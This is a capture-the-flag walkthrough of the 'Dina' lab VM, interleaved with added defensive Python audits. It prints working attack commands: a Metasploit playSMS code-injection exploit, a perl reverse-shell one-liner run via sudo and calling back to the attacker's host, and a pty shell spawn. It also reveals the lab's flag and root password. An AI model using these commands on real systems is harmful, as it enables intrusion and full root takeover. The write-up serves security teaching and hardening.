danielcastropalomares edited this page Nov 17, 2018 · 2 revisions

A first port scan shows that only port 80 is open:

root@kali:~# nmap -p- 172.31.255.124
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-17 10:49 CET
Nmap scan report for 172.31.255.124
Host is up (0.00015s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:3A:EC:D6 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.61 seconds

We scan the web directories:

root@kali:~# dirhunt http://172.31.255.124
Welcome to Dirhunt v0.6.0 using Python 3.6.7
[301] http://172.31.255.124/angel1  (Redirect)
    Redirect to: http://172.31.255.124/angel1/
[301] http://172.31.255.124/nothing  (Redirect)
    Redirect to: http://172.31.255.124/nothing/
[301] http://172.31.255.124/ange1  (Redirect)
    Redirect to: http://172.31.255.124/ange1/
[301] http://172.31.255.124/tmp  (Redirect)
    Redirect to: http://172.31.255.124/tmp/
[200] http://172.31.255.124/angel1/  (Index Of) (Nothing interesting)
[200] http://172.31.255.124/ange1/  (Index Of) (Nothing interesting)
[301] http://172.31.255.124/uploads  (Redirect)
    Redirect to: http://172.31.255.124/uploads/
[200] http://172.31.255.124/tmp/  (Index Of) (Nothing interesting)
[200] http://172.31.255.124/  (HTML document)
    Index file found: index.html
[200] http://172.31.255.124/uploads/  (Index Of) (Nothing interesting)
[200] http://172.31.255.124/nothing/  (HTML document)
    Index file found: index.html
◰ Finished after 2 seconds
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━


root@kali:~# nikto -C a -host 172.31.255.124
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          172.31.255.124
+ Target Hostname:    172.31.255.124
+ Target Port:        80
+ Start Time:         2018-11-17 10:51:32 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 425463, size: 3618, mtime: Tue Oct 17 15:46:52 2017
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /ange1/: Directory indexing found.
+ Entry '/ange1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /angel1/: Directory indexing found.
+ Entry '/angel1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /uploads/: Directory indexing found.
+ Entry '/uploads/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 5 entries which should be manually viewed.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8328 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time:           2018-11-17 10:51:48 (GMT1) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
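The nikto findings above are all configuration weaknesses on the server side (missing security headers, version disclosure, inode-bearing ETags, MultiViews, and robots.txt entries that point at browsable directory listings). The following Python is an added example, not part of the original write-up: a small offline audit of the kind a hardening review would run against a captured response. The header map, robots.txt text and the set of "Index of" paths are constructed samples modelled on the nikto output (the ETag value is built from the inode 425463 and size 3618 that nikto reports); the function names are mine.

```python
import re

# Constructed sample response headers and robots.txt, modelled on the nikto
# findings for this host (not captured from the real machine). The ETag is
# built from the inode (425463 = 0x67df7) and size (3618 = 0xe22) nikto reports.
SAMPLE_HEADERS = {
    "Server": "Apache/2.2.22 (Ubuntu)",
    "ETag": '"67df7-e22-55bc2e83ecf00"',
    "TCN": "list",
    "Content-Type": "text/html",
}
SAMPLE_ROBOTS = """User-agent: *
Disallow: /ange1/
Disallow: /angel1/
Disallow: /nothing/
Disallow: /tmp/
Disallow: /uploads/
"""
# Constructed: robots.txt paths that answered 200 with an "Index of" listing.
SAMPLE_INDEXED = {"/ange1/", "/angel1/", "/tmp/", "/uploads/"}

REQUIRED_HEADERS = {
    "X-Frame-Options": "clickjacking protection missing",
    "X-Content-Type-Options": "MIME-sniffing protection missing",
}


def decode_apache_etag(etag):
    """Split an Apache 2.2-style ETag (inode-size-mtime, all hex) into
    (inode, size); return None if the ETag is not in that format."""
    fields = etag.strip().strip('"').split("-")
    if len(fields) != 3 or not all(re.fullmatch(r"[0-9a-f]+", f) for f in fields):
        return None
    return int(fields[0], 16), int(fields[1], 16)


def audit_headers(headers):
    """Return a list of findings for a response header map (names are
    matched case-insensitively, as HTTP header names are)."""
    lower = {k.lower(): v for k, v in headers.items()}
    findings = []
    for name, why in REQUIRED_HEADERS.items():
        if name.lower() not in lower:
            findings.append(f"missing {name}: {why}")
    server = lower.get("server", "")
    if re.search(r"/\d+\.\d+", server):
        findings.append(f"Server header discloses a version: {server}")
    decoded = decode_apache_etag(lower.get("etag", ""))
    if decoded:
        findings.append(f"ETag leaks inode {decoded[0]} (size {decoded[1]}); "
                        "configure FileETag without INode")
    if lower.get("tcn", "").lower() == "list":
        findings.append("TCN: list means MultiViews is on; disable it unless needed")
    return findings


def robots_disallowed(robots_txt):
    """Paths listed under Disallow: in a robots.txt body."""
    paths = []
    for line in robots_txt.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() == "disallow" and value.strip():
            paths.append(value.strip())
    return paths


def exposed_robots_entries(robots_txt, indexed_paths):
    """robots.txt only hides paths from well-behaved crawlers; a Disallow
    path that is also directory-listed is advertised and browsable at once."""
    return [p for p in robots_disallowed(robots_txt) if p in indexed_paths]


if __name__ == "__main__":
    for finding in audit_headers(SAMPLE_HEADERS):
        print("header:", finding)
    for path in exposed_robots_entries(SAMPLE_ROBOTS, SAMPLE_INDEXED):
        print("robots.txt entry with directory listing:", path)
```

Running it against the sample reports the same five header issues nikto raised and the four robots.txt paths that are also listed by the server; a clean response (both headers present, no version, no inode ETag, no TCN) produces no findings.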

If we inspect the source code of the nothing page, we find a list of passwords:

http://172.31.255.124/nothing/
<!--#my secret pass freedom password helloworld! diana iloveroot -->
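Credentials left in an HTML comment, as above, ship to every visitor. The Python below is an added example, not code from the original write-up: a pre-deployment scanner that walks the HTML comments of a page with the standard-library parser and reports those containing credential-like keywords, with their line numbers. The sample page is constructed in the style of the comment found above; the function and class names are mine.

```python
import re
from html.parser import HTMLParser

# Constructed sample page, modelled on the comment found in /nothing/.
SAMPLE_PAGE = """<html><body>
<h1>Nothing here</h1>
<!--#my secret pass freedom password helloworld! diana iloveroot -->
<!-- TODO: remove debug banner before release -->
</body></html>
"""

# Words that suggest a comment carries secrets rather than developer notes.
KEYWORDS = re.compile(
    r"\b(pass(word|wd)?|secret|cred(ential)?s?|token|api[_-]?key)\b", re.I
)


class CommentCollector(HTMLParser):
    """Collect every HTML comment together with the line it starts on."""

    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        lineno, _offset = self.getpos()
        self.comments.append((lineno, data.strip()))


def find_sensitive_comments(html):
    """Return [(lineno, comment_text)] for comments that match KEYWORDS."""
    parser = CommentCollector()
    parser.feed(html)
    parser.close()
    return [(line, text) for line, text in parser.comments if KEYWORDS.search(text)]


if __name__ == "__main__":
    for line, text in find_sensitive_comments(SAMPLE_PAGE):
        print(f"line {line}: suspicious comment: {text}")
```

The same check fits naturally in a CI step over the built site, so a comment like this never reaches a web root; comments that merely hold developer notes (the TODO in the sample) are not reported.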

In the secure directory we find a .zip file named backup:

http://172.31.255.124/secure/
[ICO]	Name	Last modified	Size	Description
[DIR]	Parent Directory	 	- 	 
[ ]	backup.zip	17-Oct-2017 18:59 	336 	 

When we try to unzip it, it asks for a password; the password is freedom (from the password list above):

backup-cred.mp3

Inside the file we find the following content:

I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file....
uname: touhid
password: ******
url : /SecreTSMSgatwayLogin

We browse to the URL given in the previous file and, as the password, use one of the credentials from the backup-cred file:

http://172.31.255.124/SecreTSMSgatwayLogin
touhid
diana

We will use the playSMS code injection exploit:

msf > use exploit/multi/http/playsms_filename_exec
msf exploit(multi/http/playsms_filename_exec) > set RHOST 172.31.255.124
msf exploit(multi/http/playsms_filename_exec) > set LHOST 172.31.255.141
msf exploit(multi/http/playsms_filename_exec) > set USERNAME touhid
msf exploit(multi/http/playsms_filename_exec) > set PASSWORD diana
msf exploit(multi/http/playsms_filename_exec) > set TARGETURI /SecreTSMSgatwayLogin

We run the exploit and we are in:

msf exploit(multi/http/playsms_filename_exec) > exploit
[*] Started reverse TCP handler on 172.31.255.141:4444 
[+] Authentication successful : [ touhid : diana ]
[*] Sending stage (38247 bytes) to 172.31.255.124
[*] Meterpreter session 1 opened (172.31.255.141:4444 -> 172.31.255.124:41070) at 2018-11-17 22:33:32 +0100

We open a shell and spawn a tty with python:

meterpreter > shell
Process 2788 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ 

The first thing we check is the sudo permissions, and we see that the perl binary can be run with sudo without a password:

www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo -l
sudo -l
Matching Defaults entries for www-data on this host:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on this host:
    (ALL) NOPASSWD: /usr/bin/perl
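A sudoers rule that hands an interpreter to a service account is equivalent to giving that account root, whatever the intent was. The Python below is an added example, not part of the original write-up: an audit that parses `sudo -l` output of the shape shown above and flags entries whose command is ALL or a shell-capable binary (interpreters, shells, editors, pagers). The sample listing is constructed, with an extra harmless entry added for contrast; the function names and the SHELL_CAPABLE set are my own choices.

```python
import re

# Constructed `sudo -l` output in the shape of the listing above, plus a
# second, narrowly scoped entry for contrast.
SAMPLE_SUDO_L = r"""Matching Defaults entries for www-data on this host:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on this host:
    (ALL) NOPASSWD: /usr/bin/perl
    (root) /usr/sbin/service apache2 restart
"""

# Binaries that can start an arbitrary command or shell once run as root.
# Any of these in a sudoers rule is a full privilege grant, not a delegation.
SHELL_CAPABLE = {
    "perl", "python", "python2", "python3", "ruby", "node", "php",
    "sh", "bash", "dash", "zsh", "vi", "vim", "nano", "less", "more",
    "find", "awk", "env", "tar", "zip",
}

# "(runas) TAG: TAG: command ..." as printed by sudo -l
ENTRY = re.compile(r"^\s*\(([^)]*)\)\s*((?:\w+:\s*)*)(.*)$")


def parse_sudo_l(text):
    """Return the command entries of a `sudo -l` listing as dicts with
    runas, nopasswd and command keys; Defaults lines are ignored."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_commands = True
            continue
        if not in_commands or not line.strip():
            continue
        m = ENTRY.match(line)
        if not m:
            continue
        runas, tags, command = m.groups()
        entries.append({
            "runas": runas.strip(),
            "nopasswd": "NOPASSWD" in tags.upper(),
            "command": command.strip(),
        })
    return entries


def risky_entries(entries):
    """Entries that amount to a root shell: ALL, or a shell-capable binary."""
    risky = []
    for entry in entries:
        command = entry["command"]
        if command == "ALL":
            risky.append(entry)
            continue
        binary = command.split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_CAPABLE:
            risky.append(entry)
    return risky


if __name__ == "__main__":
    for entry in risky_entries(parse_sudo_l(SAMPLE_SUDO_L)):
        tag = "NOPASSWD " if entry["nopasswd"] else ""
        print(f"risky sudo rule: ({entry['runas']}) {tag}{entry['command']}")
```

For the sample, only the perl rule is reported; the service restart entry is scoped to one command and is left alone. The fix on the host is to remove the interpreter rule and, if the web application needs a privileged action, delegate a specific script with fixed arguments instead.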

Taking advantage of the perl binary, we will open a reverse shell. On our Kali Linux we listen on port 443:

nc -vlp 443

On the victim machine we open a reverse shell, specifying the IP of our Kali machine:

sudo perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"172.31.255.141:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

On the Kali machine we see a new session opened, now as the root user:

172.31.255.124: inverse host lookup failed: Unknown host
connect to [172.31.255.141] from (UNKNOWN) [172.31.255.124] 36998
id
uid=0(root) gid=0(root) groups=0(root)
python -c 'import pty;pty.spawn("/bin/bash")'
root@Dina:/var/www/SecreTSMSgatwayLogin# 

Now we can list the root directory and read the file containing the flag:

root@Dina:/var/www/SecreTSMSgatwayLogin# cd /root
cd /root
root@Dina:~# ls
ls
flag.txt
root@Dina:~# cat flag.txt
cat flag.txt
________                                                _________
\________\--------___       ___         ____----------/_________/
    \_______\----\\\\\\   //_ _ \\    //////-------/________/
	\______\----\\|| (( ~|~ )))  ||//------/________/
	    \_____\---\\ ((\ = / ))) //----/_____/
	         \____\--\_)))  \ _)))---/____/
	               \__/  (((     (((_/
	                  |  -)))  -  ))


root password is : hello@3210
easy one .....but hard to guess.....
but i think u dont need root password......
u already have root shelll....


CONGO.........
FLAG : 22d06624cd604a0626eb5a2992a6f2e6